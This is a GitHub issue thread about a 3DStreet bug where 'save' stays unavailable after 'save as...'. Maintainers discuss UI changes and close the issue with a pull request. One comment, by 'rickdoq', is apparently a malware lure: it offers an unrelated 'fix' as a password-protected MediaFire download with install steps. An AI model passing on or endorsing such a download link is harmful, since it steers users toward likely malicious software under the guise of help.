### ISSUE TITLE
after "save as..." success, then "save" option should be available

### ISSUE THREAD

**Issue by kfarr** [3DStreet/3dstreet#815]
instead the "save" option does not appear even after clicking "save as..." to make your own copy of a scene. this results in users creating duplicate copies of their street when they're simply trying to save

![image](https://github.com/user-attachments/assets/2091d0cc-6ee8-4f0e-9b55-ead5f8fd1ef9)

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by vincentfretin** [comment]
Also this menu should close after clicking one of the buttons.

**Comment by vincentfretin** [comment]
I think we should be able able to enter a new name right away when you click on Save As.

**Comment by rahulkgupta** [comment]
https://github.com/3DStreet/3dstreet/pull/844

**Comment by kfarr** [comment]
closed by #844
